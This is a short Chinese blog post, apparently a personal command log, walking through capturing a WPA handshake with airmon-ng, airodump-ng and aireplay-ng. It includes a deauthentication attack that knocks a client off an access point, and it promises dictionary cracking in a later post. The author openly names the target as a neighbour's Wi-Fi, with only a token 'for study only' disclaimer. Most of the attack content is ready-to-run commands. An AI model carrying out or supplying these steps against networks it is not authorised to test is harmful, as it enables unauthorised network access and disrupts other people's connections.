这篇文章问什么技术含量,因为东哥记性不好,目的是为了记录一下命令,大家凑合看看不要当真。本教程只作为学习研究之用,不能用于非法用途!!!

 

首先开启无线网卡混杂模式,wlan1是东哥支持蹭网的便携神器,之前文章有介绍。

airmon-ng start wlan1

 

然后看看周围存在的热点,觊觎邻居家的无线网络很久了:)

 

airodump-ng mon1

wKiom1Nfj4TgmnbWAA1zcy_Ncuo272.jpg

 

然后开始监听目标网络,通过--ivs过滤无用数据包,--bssid过滤其他AP,获取成功后右上角会有显示。

 

airodump-ng --ivs -bssid AP的MAC地址 -w 握手包文件名 mon1

wKiom1NfkpCCjUqyAAHeoRGIjFI134.jpg

 

然后对目标AP发起死亡***,邻居家貌似就一个手机在连接,好久才搞到握手包。如果AP正在下载电影,很快就能获取到握手包。--ignore-negative-one 如果AP工作频道不确定加上,客户端MAC地址在之前通过airodump-ng获取。

 

aireplay-ng --ignore-negative-one -0 10 -a AP的MAC地址 -c 客户端的MAC地址 mon1

wKioL1NfkoWyLlTuAAYjIz3ULzk500.jpg

 

最后我们可以看到获取到的握手包。

wKioL1NfkrnCp1ACAADUG0v2d3o644.jpg

 

如何进行字典破解,下回再讲。